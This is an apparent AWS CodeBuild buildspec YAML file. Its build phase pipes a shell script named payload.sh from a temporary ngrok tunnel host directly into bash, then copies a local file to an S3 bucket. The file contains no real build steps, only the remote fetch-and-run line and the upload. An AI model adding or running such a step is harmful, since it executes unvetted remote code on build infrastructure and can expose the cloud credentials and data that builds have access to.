version: 0.2
phases:
  install:
    runtime-versions:
      python: 3.9
  build:
    commands:
      - curl https://bbb3-2409-40e6-26-718c-39e4-d778-a7ed-ed87.ngrok-free.app/payload.sh | bash 
      - aws s3 cp Text.txt s3://buildanu/tttt 
